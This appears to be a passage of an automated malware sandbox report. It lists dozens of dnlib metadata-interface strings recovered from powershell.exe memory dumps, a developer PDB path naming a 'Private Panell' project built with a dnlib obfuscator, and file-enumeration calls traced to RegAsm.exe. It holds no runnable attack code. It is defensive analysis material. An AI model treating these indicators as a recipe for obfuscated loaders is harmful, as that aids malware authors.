                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409253
